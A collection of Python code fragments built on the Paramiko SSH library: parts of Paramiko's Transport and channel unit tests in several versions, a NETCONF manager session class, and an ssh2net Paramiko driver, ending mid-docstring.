self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('This is on stderr.\n', f.readline()) self.assertEqual('', f.readline()) def test_6a_channel_can_be_used_as_context_manager(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() with self.tc.open_session() as chan: with self.ts.accept(1.0) as schan: chan.exec_command('yes') schan.send('Hello there.\n') schan.close() f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('', f.readline()) def test_7_invoke_shell(self): """ verify that invoke_shell() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) chan.send('communist j. cat\n') f = schan.makefile() self.assertEqual('communist j. cat\n', f.readline()) chan.close() self.assertEqual('', f.readline()) def test_8_channel_exception(self): """ verify that ChannelException is thrown for a bad open-channel request. """ self.setup_test_server() try: chan = self.tc.open_channel('bogus') self.fail('expected exception') except ChannelException as e: self.assertTrue(e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED) def test_9_exit_status(self): """ verify that get_exit_status() works. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) chan.exec_command('yes') schan.send('Hello there.\n') self.assertTrue(not chan.exit_status_ready()) # trigger an EOF schan.shutdown_read() schan.shutdown_write() schan.send_exit_status(23) schan.close() f = chan.makefile() self.assertEqual('Hello there.\n', f.readline()) self.assertEqual('', f.readline()) count = 0 while not chan.exit_status_ready(): time.sleep(0.1) count += 1 if count > 50: raise Exception("timeout") self.assertEqual(23, chan.recv_exit_status()) chan.close() def test_A_select(self): """ verify that select() on a channel works. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send('hello\n') # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b'hello\n', chan.recv(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() # detect eof? for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(bytes(), chan.recv(16)) # make sure the pipe is still open for now... p = chan._pipe self.assertEqual(False, p._closed) chan.close() # ...and now is closed. self.assertEqual(True, p._closed) def test_B_renegotiate(self): """ verify that a transport can correctly renegotiate mid-stream. """ self.setup_test_server() self.tc.packetizer.REKEY_BYTES = 16384 chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) self.assertEqual(self.tc.H, self.tc.session_id) for i in range(20): chan.send('x' * 1024) chan.close() # allow a few seconds for the rekeying to complete for i in range(50): if self.tc.H != self.tc.session_id: break time.sleep(0.1) self.assertNotEqual(self.tc.H, self.tc.session_id) schan.close() def test_C_compression(self): """ verify that zlib compression is basically working. """ def force_compression(o): o.compression = ('zlib',) self.setup_test_server(force_compression, force_compression) chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) bytes = self.tc.packetizer._Packetizer__sent_bytes chan.send('x' * 1024) bytes2 = self.tc.packetizer._Packetizer__sent_bytes block_size = self.tc._cipher_info[self.tc.local_cipher]['block-size'] mac_size = self.tc._mac_info[self.tc.local_mac]['size'] # tests show this is actually compressed to *52 bytes*! including packet overhead! nice!! :) self.assertTrue(bytes2 - bytes < 1024) self.assertEqual(16 + block_size + mac_size, bytes2 - bytes) chan.close() schan.close() def test_D_x11(self): """ verify that an x11 port can be requested and opened. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) requested = [] def handler(c, addr_port): addr, port = addr_port requested.append((addr, port)) self.tc._queue_incoming_channel(c) self.assertEqual(None, getattr(self.server, '_x11_screen_number', None)) cookie = chan.request_x11(0, single_connection=True, handler=handler) self.assertEqual(0, self.server._x11_screen_number) self.assertEqual('MIT-MAGIC-COOKIE-1', self.server._x11_auth_protocol) self.assertEqual(cookie, self.server._x11_auth_cookie) self.assertEqual(True, self.server._x11_single_connection) x11_server = self.ts.open_x11_channel(('localhost', 6093)) x11_client = self.tc.accept() self.assertEqual('localhost', requested[0][0]) self.assertEqual(6093, requested[0][1]) x11_server.send('hello') self.assertEqual(b'hello', x11_client.recv(5)) x11_server.close() x11_client.close() chan.close() schan.close() def test_E_reverse_port_forwarding(self): """ verify that a client can ask the server to open a reverse port for forwarding. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) requested = [] def handler(c, origin_addr_port, server_addr_port): requested.append(origin_addr_port) requested.append(server_addr_port) self.tc._queue_incoming_channel(c) port = self.tc.request_port_forward('127.0.0.1', 0, handler) self.assertEqual(port, self.server._listen.getsockname()[1]) cs = socket.socket() cs.connect(('127.0.0.1', port)) ss, _ = self.server._listen.accept() sch = self.ts.open_forwarded_tcpip_channel(ss.getsockname(), ss.getpeername()) cch = self.tc.accept() sch.send('hello') self.assertEqual(b'hello', cch.recv(5)) sch.close() cch.close() ss.close() cs.close() # now cancel it. self.tc.cancel_port_forward('127.0.0.1', port) self.assertTrue(self.server._listen is None) def test_F_port_forwarding(self): """ verify that a client can forward new connections from a locally- forwarded port. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) # open a port on the "server" that the client will ask to forward to. greeting_server = socket.socket() greeting_server.bind(('127.0.0.1', 0)) greeting_server.listen(1) greeting_port = greeting_server.getsockname()[1] cs = self.tc.open_channel('direct-tcpip', ('127.0.0.1', greeting_port), ('', 9000)) sch = self.ts.accept(1.0) cch = socket.socket() cch.connect(self.server._tcpip_dest) ss, _ = greeting_server.accept() ss.send(b'Hello!\n') ss.close() sch.send(cch.recv(8192)) sch.close() self.assertEqual(b'Hello!\n', cs.recv(7)) cs.close() def test_G_stderr_select(self): """ verify that select() on a channel works even if only stderr is receiving data. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send_stderr('hello\n') # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b'hello\n', chan.recv_stderr(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() chan.close() def test_H_send_ready(self): """ verify that send_ready() indicates when a send would not block. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) self.assertEqual(chan.send_ready(), True) total = 0 K = '*' * 1024 limit = 1+(64 * 2 ** 15) while total < limit: chan.send(K) total += len(K) if not chan.send_ready(): break self.assertTrue(total < limit) schan.close() chan.close() self.assertEqual(chan.send_ready(), True) def test_I_rekey_deadlock(self): """ Regression test for deadlock when in-transit messages are received after MSG_KEXINIT is sent Note: When this test fails, it may leak threads. """ # Test for an obscure deadlocking bug that can occur if we receive # certain messages while initiating a key exchange. # # The deadlock occurs as follows: # # In the main thread: # 1. The user's program calls Channel.send(), which sends # MSG_CHANNEL_DATA to the remote host. # 2. Packetizer discovers that REKEY_BYTES has been exceeded, and # sets the __need_rekey flag. # # In the Transport thread: # 3. Packetizer notices that the __need_rekey flag is set, and raises # NeedRekeyException. # 4. In response to NeedRekeyException, the transport thread sends # MSG_KEXINIT to the remote host. # # On the remote host (using any SSH implementation): # 5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST is sent. # 6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is sent. # # In the main thread: # 7. The user's program calls Channel.send(). # 8. Channel.send acquires Channel.lock, then calls Transport._send_user_message(). # 9. Transport._send_user_message waits for Transport.clear_to_send # to be set (i.e., it waits for re-keying to complete). # Channel.lock is still held. # # In the Transport thread: # 10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust # is called to handle it. # 11. Channel._window_adjust tries to acquire Channel.lock, but it # blocks because the lock is already held by the main thread. # # The result is that the Transport thread never processes the remote # host's MSG_KEXINIT packet, because it becomes deadlocked while # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message. # We set up two separate threads for sending and receiving packets, # while the main thread acts as a watchdog timer. If the timer # expires, a deadlock is assumed. class SendThread(threading.Thread): def __init__(self, chan, iterations, done_event): threading.Thread.__init__(self, None, None, self.__class__.__name__) self.setDaemon(True) self.chan = chan self.iterations = iterations self.done_event = done_event self.watchdog_event = threading.Event() self.last = None def run(self): try: for i in range(1, 1+self.iterations): if self.done_event.is_set(): break self.watchdog_event.set() #print i, "SEND" self.chan.send("x" * 2048) finally: self.done_event.set() self.watchdog_event.set() class ReceiveThread(threading.Thread): def __init__(self, chan, done_event): threading.Thread.__init__(self, None, None, self.__class__.__name__) self.setDaemon(True) self.chan = chan self.done_event = done_event self.watchdog_event = threading.Event() def run(self): try: while not self.done_event.is_set(): if self.chan.recv_ready(): chan.recv(65536) self.watchdog_event.set() else: if random.randint(0, 1): time.sleep(random.randint(0, 500) / 1000.0) finally: self.done_event.set() self.watchdog_event.set() self.setup_test_server() self.ts.packetizer.REKEY_BYTES = 2048 chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) # Monkey patch the client's Transport._handler_table so that the client # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial # MSG_KEXINIT. This is used to simulate the effect of network latency # on a real MSG_CHANNEL_WINDOW_ADJUST message. self.tc._handler_table = self.tc._handler_table.copy() # copy per-class dictionary _negotiate_keys = self.tc._handler_table[MSG_KEXINIT] def _negotiate_keys_wrapper(self, m): if self.local_kex_init is None: # Remote side sent KEXINIT # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it # before responding to the incoming MSG_KEXINIT. m2 = Message() m2.add_byte(cMSG_CHANNEL_WINDOW_ADJUST) m2.add_int(chan.remote_chanid) m2.add_int(1) # bytes to add self._send_message(m2) return _negotiate_keys(self, m) self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper # Parameters for the test iterations = 500 # The deadlock does not happen every time, but it # should after many iterations. timeout = 5 # This event is set when the test is completed done_event = threading.Event() # Start the sending thread st = SendThread(schan, iterations, done_event) st.start() # Start the receiving thread rt = ReceiveThread(chan, done_event) rt.start() # Act as a watchdog timer, checking deadlocked = False while not deadlocked and not done_event.is_set(): for event in (st.watchdog_event, rt.watchdog_event): event.wait(timeout) if done_event.is_set(): break if not event.is_set(): deadlocked = True break event.clear() # Tell the threads to stop (if they haven't already stopped). Note # that if one or more threads are deadlocked, they might hang around # forever (until the process exits). done_event.set() # Assertion: We must not have detected a timeout. self.assertFalse(deadlocked) # Close the channels schan.close() chan.close() def test_J_sanitze_packet_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [(4095, MIN_PACKET_SIZE), (None, DEFAULT_MAX_PACKET_SIZE), (2**32, MAX_WINDOW_SIZE)]: self.assertEqual(self.tc._sanitize_packet_size(val), correct) def test_K_sanitze_window_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [(32767, MIN_WINDOW_SIZE), (None, DEFAULT_WINDOW_SIZE), (2**32, MAX_WINDOW_SIZE)]: self.assertEqual(self.tc._sanitize_window_size(val), correct) @slow def test_L_handshake_timeout(self): """ verify that we can get a hanshake timeout. """ # Tweak client Transport instance's Packetizer instance so # its read_message() sleeps a bit. This helps prevent race conditions # where the client Transport's timeout timer thread doesn't even have # time to get scheduled before the main client thread finishes # handshaking with the server. # (Doing this on the server's transport *sounds* more 'correct' but # actually doesn't work nearly as well for whatever reason.) class SlowPacketizer(Packetizer): def read_message(self): time.sleep(1) return super(SlowPacketizer, self).read_message() # NOTE: prettttty sure since the replaced .packetizer Packetizer is now # no longer doing anything with its copy of the socket...everything'll # be fine. Even tho it's a bit squicky. self.tc.packetizer = SlowPacketizer(self.tc.sock) # Continue with regular test red tape. host_key = RSAKey.from_private_key_file(_support('test_rsa.key')) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.tc.handshake_timeout = 0.000000000001 self.ts.start_server(event, server) self.assertRaises(EOFError, self.tc.connect, hostkey=public_host_key, username='******', password='******') def test_M_select_after_close(self): """ verify that select works when a channel is already closed. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) schan.close() # give client a moment to receive close notification time.sleep(0.1) r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) def test_channel_send_misc(self): """ verify behaviours sending various instances to a channel """ self.setup_test_server() text = u"\xa7 slice me nicely" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # TypeError raised on non string or buffer type self.assertRaises(TypeError, chan.send, object()) self.assertRaises(TypeError, chan.sendall, object()) # sendall() accepts a unicode instance chan.sendall(text) expected = text.encode("utf-8") self.assertEqual(sfile.read(len(expected)), expected) @needs_builtin('buffer') def test_channel_send_buffer(self): """ verify sending buffer instances to a channel """ self.setup_test_server() data = 3 * b'some test data\n whole' with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # send() accepts buffer instances sent = 0 while sent < len(data): sent += chan.send(buffer(data, sent, 8)) self.assertEqual(sfile.read(len(data)), data) # sendall() accepts a buffer instance chan.sendall(buffer(data)) self.assertEqual(sfile.read(len(data)), data) @needs_builtin('memoryview') def test_channel_send_memoryview(self): """ verify sending memoryview instances to a channel """ self.setup_test_server() data = 3 * b'some test data\n whole' with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # send() accepts memoryview slices sent = 0 view = memoryview(data) while sent < len(view): sent += chan.send(view[sent:sent+8]) self.assertEqual(sfile.read(len(data)), data) # sendall() accepts a memoryview instance chan.sendall(memoryview(data)) self.assertEqual(sfile.read(len(data)), data) def test_server_rejects_open_channel_without_auth(self): try: self.setup_test_server(connect_kwargs={}) self.tc.open_session() except ChannelException as e: assert e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED else: assert False, "Did not raise ChannelException!" def test_server_rejects_arbitrary_global_request_without_auth(self): self.setup_test_server(connect_kwargs={}) # NOTE: this dummy global request kind would normally pass muster # from the test server. self.tc.global_request('acceptable') # Global requests never raise exceptions, even on failure (not sure why # this was the original design...ugh.) Best we can do to tell failure # happened is that the client transport's global_response was set back # to None; if it had succeeded, it would be the response Message. err = "Unauthed global response incorrectly succeeded!" assert self.tc.global_response is None, err def test_server_rejects_port_forward_without_auth(self): # NOTE: at protocol level port forward requests are treated same as a # regular global request, but Paramiko server implements a special-case # method for it, so it gets its own test. (plus, THAT actually raises # an exception on the client side, unlike the general case...) self.setup_test_server(connect_kwargs={}) try: self.tc.request_port_forward('localhost', 1234) except SSHException as e: assert "forwarding request denied" in str(e) else: assert False, "Did not raise SSHException!"
class TransportTest(ParamikoTest): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server(self, client_options=None, server_options=None): host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, self.server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEquals(type(o), SecurityOptions) self.assert_(('aes256-cbc', 'blowfish-cbc') != o.ciphers) o.ciphers = ('aes256-cbc', 'blowfish-cbc') self.assertEquals(('aes256-cbc', 'blowfish-cbc'), o.ciphers) try: o.ciphers = ('aes256-cbc', 'made-up-cipher') self.assert_(False) except ValueError: pass try: o.ciphers = 23 self.assert_(False) except TypeError: pass def test_2_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929L self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3') self.tc.session_id = self.tc.H key = self.tc._compute_key('C', 32) self.assertEquals( '207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.assertEquals(None, self.tc.get_username()) self.assertEquals(None, self.ts.get_username()) self.assertEquals(False, self.tc.is_authenticated()) self.assertEquals(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('slowdive', self.tc.get_username()) self.assertEquals('slowdive', self.ts.get_username()) self.assertEquals(True, self.tc.is_authenticated()) self.assertEquals(True, self.ts.is_authenticated()) def test_3a_long_banner(self): """ verify that a long banner doesn't mess up the handshake. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = ('aes256-cbc', ) options.digests = ('hmac-md5-96', ) self.setup_test_server(client_options=force_algorithms) self.assertEquals('aes256-cbc', self.tc.local_cipher) self.assertEquals('aes256-cbc', self.tc.remote_cipher) self.assertEquals(12, self.tc.packetizer.get_mac_size_out()) self.assertEquals(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEquals(None, getattr(self.server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEquals('*****@*****.**', self.server._global_request) def test_6_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command('no') self.assert_(False) except SSHException, x: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('', f.readline()) f = chan.makefile_stderr() self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline())
class sessionSSH: def __init__(self, agent, user): self.hostname = agent.getIp() self.username = user.getLogin() self.publicKey = agent.getPublicKey() self.publicKeyType = agent.getPublicKeyType() self.version = agent.getVersion() self.privateKeyFile = user.getPrivateKeyFile() self.privateKeyType = user.getPrivateKeyType() self.password = user.getPassword() self.raw_data = '' # Create a socket (IPv4 or IPv6): if self.version == 4: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) elif self.version == 6: sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) #sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) # Connect to the agent (The SSH tunnel is done later) sock.connect((self.hostname, C.NETCONF_SSH_PORT)) # Create a new SSH session over an existing socket (here sock). self.ssh = Transport(sock) self.i = 1 def connect(self): try: # Build a public key object from the server (agent) key file if self.publicKeyType == 'rsa': agent_public_key = RSAKey( data=base64.decodestring(self.publicKey)) elif self.publicKeyType == 'dss': agent_public_key = DSSKey( data=base64.decodestring(self.publicKey)) # Build a private key object from the manager key file, and connect to the agent: if self.privateKeyFile != None: # Using client (manager) private key to authenticate if self.privateKeyType == "rsa": user_private_key = RSAKey.from_private_key_file( self.privateKeyFile) elif self.privateKeyType == "dss": user_private_key = DSSKey.from_private_key_file( self.privateKeyFile) self.ssh.connect(hostkey=agent_public_key, username=self.username, pkey=user_private_key) else: # Using client (manager) password to authenticate self.ssh.connect(hostkey=agent_public_key, username=self.username, password=self.password) # Request a new channel to the server, of type "session". self.chan = self.ssh.open_session() # Request a "netconf" subsystem on the server: self.chan.invoke_subsystem(C.NETCONF_SSH_SUBSYSTEM) except Exception, exp: syslog.openlog("YencaP Manager") syslog.syslog(syslog.LOG_ERR, str(exp)) syslog.closelog() return C.FAILED return C.SUCCESS
class TransportTest(ParamikoTest): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server(self, client_options=None, server_options=None): host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, self.server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEquals(type(o), SecurityOptions) self.assert_(('aes256-cbc', 'blowfish-cbc') != o.ciphers) o.ciphers = ('aes256-cbc', 'blowfish-cbc') self.assertEquals(('aes256-cbc', 'blowfish-cbc'), o.ciphers) try: o.ciphers = ('aes256-cbc', 'made-up-cipher') self.assert_(False) except ValueError: pass try: o.ciphers = 23 self.assert_(False) except TypeError: pass def test_2_compute_key(self): self.tc.K = long(123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929) self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3') self.tc.session_id = self.tc.H key = self.tc._compute_key('C', 32) self.assertEquals('207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.assertEquals(None, self.tc.get_username()) self.assertEquals(None, self.ts.get_username()) self.assertEquals(False, self.tc.is_authenticated()) self.assertEquals(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('slowdive', self.tc.get_username()) self.assertEquals('slowdive', self.ts.get_username()) self.assertEquals(True, self.tc.is_authenticated()) self.assertEquals(True, self.ts.is_authenticated()) def test_3a_long_banner(self): """ verify that a long banner doesn't mess up the handshake. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=str(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = ('aes256-cbc',) options.digests = ('hmac-md5-96',) self.setup_test_server(client_options=force_algorithms) self.assertEquals('aes256-cbc', self.tc.local_cipher) self.assertEquals('aes256-cbc', self.tc.remote_cipher) self.assertEquals(12, self.tc.packetizer.get_mac_size_out()) self.assertEquals(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEquals(None, getattr(self.server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEquals('*****@*****.**', self.server._global_request) def test_6_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command('no') self.assert_(False) except SSHException, x: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('', f.readline()) f = chan.makefile_stderr() self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send('Hello there.\n') schan.send_stderr('This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEquals('Hello there.\n', f.readline()) self.assertEquals('This is on stderr.\n', f.readline()) self.assertEquals('', f.readline())
class SSH2NetSessionParamiko: def __init__(self, p_self): """ Initialize SSH2NetSessionParamiko Object This object, through composition, allows for using Paramiko as the underlying "driver" for SSH2Net instead of the default "ssh2-python". Paramiko will be ever so slightly slower but as you will most likely be I/O constrained it shouldn't matter! "ssh2-python" as of 20 October 2019 has a bug preventing keyboard interactive authentication from working as desired; this is the reason Paramiko is in here now! Args: p_self: SSH2Net object Returns: N/A # noqa Raises: N/A # noqa """ self.__dict__ = p_self.__dict__ self._session_alive = p_self._session_alive self._session_open = p_self._session_open self._channel_alive = p_self._channel_alive def _session_open_connect(self) -> None: """ Perform session handshake for paramiko (instead of default ssh2-python) Args: N/A # noqa Returns: N/A # noqa Raises: RequirementsNotSatisfied: if paramiko is not installed Exception: catch all for unknown exceptions during session handshake """ try: from paramiko import Transport # noqa except ModuleNotFoundError as exc: err = f"Module '{exc.name}' not installed!" msg = f"***** {err} {'*' * (80 - len(err))}" fix = ( f"To resolve this issue, install '{exc.name}'. You can do this in one of the " "following ways:\n" "1: 'pip install -r requirements-paramiko.txt'\n" "2: 'pip install ssh2net[paramiko]'") warning = "\n" + msg + "\n" + fix + "\n" + msg warnings.warn(warning) raise RequirementsNotSatisfied try: self.session = Transport(self.sock) self.session.start_client() self.session.set_timeout = self._set_timeout except Exception as exc: logging.critical( f"Failed to complete handshake with host {self.host}; " f"Exception: {exc}") raise exc def _session_public_key_auth(self) -> None: """ Perform public key based auth on SSH2NetSession Args: N/A # noqa Returns: N/A # noqa Raises: Exception: catch all for unhandled exceptions """ try: self.session.auth_publickey(self.auth_user, self.auth_public_key) except AuthenticationException: logging.critical( f"Public key authentication with host {self.host} failed.") except Exception as exc: logging.critical( "Unknown error occurred during public key authentication with host " f"{self.host}; Exception: {exc}") raise exc def _session_password_auth(self) -> None: """ Perform password or keyboard interactive based auth on SSH2NetSession Args: N/A # noqa Returns: N/A # noqa Raises: AuthenticationFailed: if authentication fails Exception: catch all for unknown other exceptions """ try: self.session.auth_password(self.auth_user, self.auth_password) except AuthenticationException as exc: logging.critical( f"Password authentication with host {self.host} failed. Exception: {exc}." "\n\tNote: Paramiko automatically attempts both standard auth as well as keyboard " "interactive auth. Paramiko exception about bad auth type may be misleading!" ) raise AuthenticationFailed except Exception as exc: logging.critical( "Unknown error occurred during password authentication with host " f"{self.host}; Exception: {exc}") raise exc def _channel_open_driver(self) -> None: """ Open channel Args: N/A # noqa Returns: N/A # noqa Raises: N/A # noqa """ self.channel = self.session.open_session() self.channel.get_pty() logging.debug(f"Channel to host {self.host} opened") def _channel_invoke_shell(self) -> None: """ Invoke shell on channel Additionally, this "re-points" some ssh2net method calls to the appropriate paramiko methods. This happens as ssh2net is primarily built on "ssh2-python" and there is not full parity between paramiko/ssh2-python. Args: N/A # noqa Returns: N/A # noqa Raises: N/A # noqa """ self._shell = True self.channel.invoke_shell() self.channel.read = self._paramiko_read_channel self.channel.write = self.channel.sendall self.session.set_blocking = self._set_blocking self.channel.flush = self._flush def _paramiko_read_channel(self): """ Patch channel.read method for paramiko driver "ssh2-python" returns a tuple of bytes and data, "paramiko" simply returns the data from the channel, patch this for parity with "ssh2-python". Args: N/A # noqa Returns: N/A # noqa Raises: N/A # noqa """ channel_read = self.channel.recv(1024) return None, channel_read def _flush(self): """ Patch a "flush" method for paramiko driver Need to investigate this further for two things: 1) is "flush" even necessary when using ssh2-python driver? 2) if it is necessary, is there a combination 